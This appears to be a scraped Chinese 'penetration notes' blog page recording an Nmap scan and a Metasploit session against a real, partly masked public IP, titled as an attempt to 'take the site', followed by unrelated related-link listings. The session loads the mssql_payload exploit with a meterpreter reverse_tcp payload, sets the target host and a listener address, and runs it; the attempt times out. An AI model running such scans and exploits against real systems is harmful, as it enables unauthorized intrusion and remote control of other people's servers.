扫描一下

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间

NSE: Loaded 49 scripts for scanning.

Initiating Ping Scan at 09:36

Scanning 203.171.239.* [4 ports]

Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:36

Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed

Initiating SYN Stealth Scan at 09:36

Scanning 203.171.239.* [1000 ports]

Discovered open port 3389/tcp on 203.171.239.*

Discovered open port 80/tcp on 203.171.239.*

Discovered open port 3306/tcp on 203.171.239.*

Discovered open port 21/tcp on 203.171.239.*

Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)

Initiating Service scan at 09:36

Scanning 4 services on 203.171.239.*

Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 203.171.239.*

Retrying OS detection (try #2) against 203.171.239.*

Initiating Traceroute at 09:37

Completed Traceroute at 09:37, 0.06s elapsed

Initiating Parallel DNS resolution of 1 host. at 09:37

Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed

NSE: Script scanning 203.171.239.*.

NSE: Starting runlevel 1 (of 1) scan.

Initiating NSE at 09:37

Completed NSE at 09:37, 5.22s elapsed

NSE: Script Scanning completed.

Nmap scan report for 203.171.239.*

Host is up (0.043s latency).

Not shown: 994 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

25/tcp closed smtp

80/tcp open http Microsoft IIS httpd

|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

|_html-title: Site doesn't have a title (text/html).

110/tcp closed pop3

3306/tcp open mysql MySQL 5.1.32-community

| mysql-info: Protocol: 10

| Version: 5.1.32-community

| Thread ID: 30457

| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection

| Status: Autocommit

|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O

3389/tcp open microsoft-rdp Microsoft Terminal Service

Device type: general purpose|media device

Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)

Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Busy server or unknown class

Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)

HOP RTT ADDRESS

1 50.00 ms 203.171.239.*

Read data files from: D:\metasploit\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds

Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

开始拿站

Welcome to the Metasploit Web Console!

_ _

_ | | (_)_

____ ____| |_ ____ ___ ____ | | ___ _| |_

| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)

|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload

>> info windows/mssql/mssql_payload

Name: Microsoft SQL Server Payload Execution

Version: 9669

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

David Kennedy "ReL1K" <kennedyd013@gmail.com>

jduck <jduck@metasploit.com>

Available targets:

Id Name

-- ----

0 Automatic

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload information:

Description:

This module will execute an arbitrary payload on a Microsoft SQL

Server, using the Windows debug.com method for writing an executable

to disk and the xp_cmdshell stored procedure. File size restrictions

are avoided by incorporating the debug bypass method presented at

Defcon 17 by SecureState. Note that this module will leave a

metasploit payload in the Windows System32 directory which must be

manually deleted once the attack is completed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402

http://www.osvdb.org/557

http://www.securityfocus.com/bid/1281

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209

http://www.osvdb.org/15757

http://www.securityfocus.com/bid/4797

http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload

>> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

>> set RHOST 203.171.239.*

RHOST => 203.171.239.*

>> set LHOST 172.16.2.101

LHOST => 172.16.2.101

>> exploit

[*] Started reverse handler on 172.16.2.101:4444

[-] Exploit failed: The connection timed out (203.171.239.*:1433).

[*] Exploit completed, but no session was created.

渗透杂记-2013-07-13 windows/mssql/mssql_payload的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  3. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  4. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  5. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  6. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

    原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件 ...

随机推荐

  1. Python开发【十一章】:数据库操作Memcache、Redis

    一.Memcached Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载.它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态.数据库驱动网站的 ...

  2. 区间重叠计算及IntervalTree初识

    最近被人问到这样一个问题的解决方案:在一个餐馆的预定系统中,接受用户在未来任意一段时间内的预订用餐,用户在预订的时候需要提供用餐的开始时间和结束,餐馆的餐桌是用限的,问题是,系统要在最快的时间段计算出 ...

  3. python之面向对象编程

    1.面向对象介绍: 世界万物,皆可分类 世界万物,皆为对象 只要是对象,就肯定属于某种类 只要是对象,就肯定有属性 2. 面向对象的几个特性: class类: 一个类即对一类拥有相同属性的对象的抽象, ...

  4. lua unit test introduction

    Unit Test Unit testing is about testing your code during development, not in production. Typically y ...

  5. Jquery操作select,左右移动,双击移动 取到所有option的值

    $(function () { function MoveItem(fromId, toId) { $("#" + fromId + " option:selected& ...

  6. 为什么使用spring

    现在基本的项目都会用到spring框架,那么我们为什么要使用spring呢?下面为大家总结一下,希望大家指正. spring是一个轻量级的容器框架,其核心是IOC(控制反转也叫依赖注入)和AOP(面向 ...

  7. mysql 5.0.46安装配置

    http://os.chinaunix.net/a2008/0801/986/000000986346.shtml RPM包和源码包存放位置 /usr/local/src 源码包编译安装位置(pref ...

  8. JAVA反射参数传递

    引用:http://fish2700.blog.163.com/blog/static/130713192009103035723281/ 使用Method反射调用函数时,我们通常会遇到以下几种情况: ...

  9. VS2010中汉字拷贝到Word出现乱码问题解决

    VS2010中的汉字拷贝到Word时出现乱码,有三种解决方法: 一.粘贴时,选择“仅保留文本”.如图: 二.先拷贝粘贴到记事本文件内,此时会自动过滤格式信息,再从记事本拷贝到Word. 三.使用转换软 ...

  10. VB.NET中Form窗体运行时,按F1进入全屏状态

    1.在KeyDown事件中添加: If e.KeyValue = 112 Then Me.WindowState = FormWindowState.Maximized End If 注:1.其中11 ...